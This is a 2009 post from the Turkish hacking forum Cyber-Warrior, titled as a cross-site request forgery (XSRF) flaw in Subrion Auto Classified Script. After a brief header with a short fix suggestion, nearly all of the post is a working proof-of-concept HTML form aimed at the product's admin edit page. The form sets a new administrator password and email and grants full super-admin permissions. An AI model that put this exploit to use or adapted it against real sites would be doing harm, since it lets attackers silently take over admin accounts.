ROOT
FORUM ROOT
PORTAL ROOT
CYBER NAVIGATION
DÖKÜMANLAR
DÖKÜMAN EKLE
DOWNLOAD/DOSYA ARSIVI
BASINDA CW
CYBER ACADEMY
ORGANIZASYON
NELER YAPTIK?
OPERASYON YÖNETIM SISTEMI
GÖREV ORG. BASVURU
YÖNETICI BASVURU FORMU
MISYON
KURALLAR
KEFALET
KEFIL HAVUZU
MEMBER NAVIGATION
YENI ÜYE BASVURU
PROFIL
MEMBER NETWORK
SIFREMI UNUTTUM
ÖZEL MESAJLARIM
ONAY E-POSTA GÖNDER
Root
>
Exploits / Vulnerabilities
> Subrion Auto Classified Script ~ XSRF Vuln.
Subrion Auto Classified Script ~ XSRF Vuln. | Cyber-Warrior Information Technology's World
Madde
Author :
Bug Researchers/CWH1RLPOOL
Date :
13.09.2009 20:14:04
#
Subrion Auto Classified Script ~ XSRF Vuln.
[Full Screen Display]
< ------------------- header data start ------------------- > ############################################################# # Application Name :Subrion Auto Classified Script # vulnerable Type : xsrf # Infection : Uzaktan otomatik olarak admin bilgileri degistirebilinir. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. # author : BUG RESEARCHERS//CWH1RLPOOL ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <form action=http://autos.subrion.com/admin/admins_manage.php?id=1&action=edit method=post> <input type=hidden name=prevent_csrf value=174eac6f2b /><table cellspacing=0 cellpadding=0 width=100% class=striped> <td class=caption colspan=2><strong>General Information</strong></td> <td width=200><strong>username:</strong></td> <td><input type=text name=username size=22 value=admin/></td> <td><strong>Full Name:</strong></td> <td><input type=text name=fullname size=22 value=Administrator/></td> <td><strong>Email:</strong></td> <td><input type=text name=email size=22 value=admin@subrion.com /></td> <td><strong>password:</strong></td> <td><input type=password name=new_pass size=22 /></td> <td><strong>password Confirmation:</strong></td> <td><input type=password name=new_pass2 size=22 /></td> <td><strong>Status:</strong></td> <td><select name=status> <option value=approval >Approval</option> <option value=active selected=selected>Active</option> </select></td> <td class=caption colspan=2><strong>Admin Permissions</strong></td> <td><strong>Super Admin:</strong></td> <td><input type=radio name=super value=1 id=type1 checked=checked onclick=javascript:$(’#permissions’).fadeOut(); /><label for=type1>Enabled</label> <input type=radio name=super value=0 id=type0 onclick=javascript:$(’#permissions’).fadeIn();/><label for=type0>Disabled</label> </td> </table> <div id=permissions style=display: none;> <fieldset class=collapsible style=float:left;margin-left:20px;><legend>Common</legend><input type=checkbox onclick=var hsrc = this; $(’input.group_Common’).each(function() { if($(this).attr(’checked’) && !$(hsrc).attr(’checked’)) { $(this).removeAttr(’checked’); } else { $(this).attr(’checked’, ’checked’); } });><i>select All </i><br /> <ul style=list-style-type:none><li><input type=checkbox class=group_Common name=permissions[] value=admin_home id=tsadmin_home /><label for=tsadmin_home>Admin Panel</label></li><li><input type=checkbox class=group_Common name=permissions[] value=configuration id=tsconfiguration /><label for=tsconfiguration>Configuration</label></li><li><input type=checkbox class=group_Common name=permissions[] value=admins_manage id=tsadmins_manage /><label for=tsadmins_manage>Manage Admins</label></li><li><input type=checkbox class=group_Common name=permissions[] value=pages_manage id=tspages_manage /><label for=tspages_manage>Manage Pages</label></li><li><input type=checkbox class=group_Common name=permissions[] value=plugins_manage id=tsplugins_manage /><label for=tsplugins_manage>Manage Plugins</label></li><li><input type=checkbox class=group_Common name=permissions[] value=packages_manage id=tspackages_manage /><label for=tspackages_manage>Manage Packages</label></li><li><input type=checkbox class=group_Common name=permissions[] value=database_manage id=tsdatabase_manage /><label for=tsdatabase_manage>Manage Database</label></li><li><input type=checkbox class=group_Common name=permissions[] value=menus_manage id=tsmenus_manage /><label for=tsmenus_manage>Manage Menus</label></li><li><input type=checkbox class=group_Common name=permissions[] value=language_manage id=tslanguage_manage /><label for=tslanguage_manage>Language Manager</label></li><li><input type=checkbox class=group_Common name=permissions[] value=blocks_manage id=tsblocks_manage /><label for=tsblocks_manage>Manage Blocks</label></li><li><input type=checkbox class=group_Common name=permissions[] value=visual_manage id=tsvisual_manage /><label for=tsvisual_manage>Visual Manage</label></li><li><input type=checkbox class=group_Common name=permissions[] value=transactions_manage id=tstransactions_manage /><label for=tstransactions_manage>Manage Transactions</label></li><li><input type=checkbox class=group_Common name=permissions[] value=plans_manage id=tsplans_manage /><label for=tsplans_manage>Manage Plans</label></li></fieldset><fieldset class=collapsible style=float:left;margin-left:20px;><legend>Accounts</legend><input type=checkbox onclick=var hsrc = this; $(’input.group_Accounts’).each(function() { if($(this).attr(’checked’) && !$(hsrc).attr(’checked’)) { $(this).removeAttr(’checked’); } else { $(this).attr(’checked’, ’checked’); } });><i>select All </i><br /> <ul style=list-style-type:none><li><input type=checkbox class=group_Accounts name=permissions[] value=accounts_fields_manage id=tsaccounts_fields_manage /><label for=tsaccounts_fields_manage>Accounts Fields</label></li><li><input type=checkbox class=group_Accounts name=permissions[] value=accounts_fields_groups_manage id=tsaccounts_fields_groups_manage /><label for=tsaccounts_fields_groups_manage>Accounts FieldGroups</label></li><li><input type=checkbox class=group_Accounts name=permissions[] value=accounts_manage id=tsaccounts_manage /><label for=tsaccounts_manage>Manage Accounts</label></li><li><input type=checkbox class=group_Accounts name=permissions[] value=accounts_search id=tsaccounts_search /><label for=tsaccounts_search>Search account</label></li><li><input type=checkbox class=group_Accounts name=permissions[] value=accounts_add id=tsaccounts_add /><label for=tsaccounts_add>Add account</label></li></fieldset><fieldset class=collapsible style=float:left;margin-left:20px;><legend>Autos</legend><input type=checkbox onclick=var hsrc = this; $(’input.group_Autos’).each(function() { if($(this).attr(’checked’) && !$(hsrc).attr(’checked’)) { $(this).removeAttr(’checked’); } else { $(this).attr(’checked’, ’checked’); } });><i>select All </i><br /> <ul style=list-style-type:none><li><input type=checkbox class=group_Autos name=permissions[] value=autos_fields_groups_manage id=tsautos_fields_groups_manage /><label for=tsautos_fields_groups_manage>Autos Field Groups</label></li><li><input type=checkbox class=group_Autos name=permissions[] value=makes_browse id=tsmakes_browse /><label for=tsmakes_browse>Browse Makes</label></li><li><input type=checkbox class=group_Autos name=permissions[] value=makes_submit id=tsmakes_submit /><label for=tsmakes_submit>Submit Make</label></li><li><input type=checkbox class=group_Autos name=permissions[] value=autos_fields_manage id=tsautos_fields_manage /><label for=tsautos_fields_manage>Autos Fields</label></li><li><input type=checkbox class=group_Autos name=permissions[] value=autos_manage id=tsautos_manage /><label for=tsautos_manage>Manage Autos</label></li><li><input type=checkbox class=group_Autos name=permissions[] value=autos_submit id=tsautos_submit /><label for=tsautos_submit>Submit Auto</label></li><li><input type=checkbox class=group_Autos name=permissions[] value=autos_search id=tsautos_search /><label for=tsautos_search>Search Auto</label></li></fieldset><fieldset class=collapsible style=float:left;margin-left:20px;><legend>Other</legend><input type=checkbox onclick=var hsrc = this; $(’input.group_Other’).each(function() { if($(this).attr(’checked’) && !$(hsrc).attr(’checked’)) { $(this).removeAttr(’checked’); } else { $(this).attr(’checked’, ’checked’); } });><i>select All </i><br /> <ul style=list-style-type:none><li><input type=checkbox class=group_Other name=permissions[] value=contact_us id=tscontact_us /><label for=tscontact_us>Contact Us</label></li></fieldset><div style=clear:both;></div> </div> <table cellspacing=0 width=100%> <tr class=all> <td colspan=2><input type=submit class=button name=save value=Save Changes /> <input type=hidden name=id value=1 /> <input type=hidden name=action value=edit /> </td> </table> </form> < -- bug code end of -- >
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©
